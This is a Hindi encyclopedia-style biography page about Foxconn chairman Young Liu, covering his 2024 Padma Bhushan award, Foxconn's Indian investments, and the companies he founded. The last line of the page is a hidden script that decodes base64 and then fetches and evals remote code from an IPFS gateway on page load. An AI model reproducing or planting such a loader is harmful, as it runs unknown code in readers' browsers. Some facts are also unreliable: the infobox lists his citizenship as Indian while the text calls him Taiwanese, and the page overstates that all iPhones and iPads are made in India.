यंग लियू

भारत डिस्कवरी प्रस्तुति
(Young Liu से अनुप्रेषित)
यहाँ जाएँ:नेविगेशन, खोजें
यंग लियू
यंग लियू
यंग लियू
पूरा नाम यंग लियू
कर्म-क्षेत्र उद्योगपति और व्यापारी
पुरस्कार-उपाधि पद्म भूषण, 2024
प्रसिद्धि 'फॉक्सकॉन' के सीईओ
नागरिकता भारतीय
अन्य जानकारी यंग लियू ने पहली कंपनी साल 1988 में 'यंग माइक्रो सिस्टम्स' के नाम से बनाई थी। यह कंपनी मदरबोर्ड बनाती है।
अद्यतन‎

यंग लियू (अंग्रेज़ी: Young Liu) ताइवान की प्रसिद्ध कंपनी 'फॉक्सकॉन' (Foxconn) के सीईओ हैं। वर्ष 2024 में भारत सरकार ने यंग लियू को पद्म भूषण से सम्मानित किया है। यंग लियू ही वही शख्स हैं, जिन्‍होंने चीन से फॉक्‍सकॉन के मैन्‍युफैक्‍चरिंग प्‍लांट को हटाकर भारत में शिफ्ट किया है। फॉक्‍सकॉन ऐपल के प्रोडक्‍ट बनाती है और अब आईफोन से लेकर आईपैड तक सभी भारत में ही बन रहे हैं।

भारत में निवेश

पद्म भूषण से सम्मानित ताइवानी टेक्नोलॉजी दिग्गज फॉक्सकॉन के सीईओ और चेयरमैन यंग लियू का कहना है कि वह भारत सरकार से पुरस्कार पाकर बेहद सम्मानित महसूस कर रहे हैं। यह पुरस्कार तब मिला, जब वैश्विक स्तर पर लगभग 70 प्रतिशत आईफोन बनाने वाली फॉक्सकॉन भारत में स्थानीय विनिर्माण की दिशा में भारी निवेश कर रही है"। लियू ने कहा, 'इस जबरदस्त विशिष्टता के लिए प्रधानमंत्री, राष्ट्रपति और भारत के अद्भुत लोगों को मेरा हार्दिक धन्यवाद। मेरा दृढ़ विश्वास है कि यह एक ऐसे सहयोग की पुष्टि है जो भारत के दीर्घकालिक विकास को लाभ पहुंचाता है और स्थानीय अर्थव्यवस्थाओं के विकास का समर्थन करता है'। उन्होंने कहा, 'मैं अपनी टीम को प्रेरित करता रहूंगा। आइए भारत में विनिर्माण और समाज की भलाई के लिए अपना योगदान दें।'[1]

बढ़ा रहे हैं कारोबार

फॉक्सकॉन के पास पहले से ही तमिलनाडु में एक आईफोन फैक्ट्री है, जिसमें 40,000 लोग कार्यरत हैं और उसने राज्य में एक नई इलेक्ट्रॉनिक्स घटक इकाई में 1,600 करोड़ रुपये का निवेश करने के लिए समझौते पर हस्ताक्षर किए हैं, जिससे 6,000 नौकरियां पैदा होंगी। कंपनी ने यह भी घोषणा की है कि वह तेलंगाना में अपनी विनिर्माण सुविधा में अतिरिक्त 3,300 करोड़ रुपये का निवेश करेगी। इससे राज्य में कंपनी का कुल निवेश 4,550 करोड़ रुपये से अधिक हो जाएगा।

फॉक्सकॉन के चेयरमैन यंग लियू ने हाल ही में वैश्विक सेमीकंडक्टर कंपनियों के लिए आयोजित 'सेमीकॉनइंडिया 2023' कार्यक्रम में भाग लेने के लिए भारत का दौरा किया, जिसका उद्घाटन प्रधानमंत्री नरेंद्र मोदी ने गांधीनगर में किया था।

तीन बड़ी कंपनियाँ

यंग लियू एक बड़े इनोवेटर के तौर पर जाने जाते हैं। ऐसा इसलिए क्‍योंकि इन्‍होंने तीन ऐसी कंपनियों की स्‍थापना की है जो अपने-अपने क्षेत्र में बड़ा कद रखती हैं। पहली कंपनी उन्‍होंने साल 1988 में 'यंग माइक्रो सिस्टम्स' के नाम से बनाई थी। यह कंपनी मदरबोर्ड बनाती है। इसके बाद साल 1995 में आईसी डिजाइन की दूसरी बड़ी कंपनी की स्‍थापना की थी। यह कंपनी पीसी चिपसेट के लिए आईसी डिजाइन करती है। इसके बाद 1997 में 'आईटीई टेक्‍नॉलॉजी' नाम की कंपनी खोली थी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>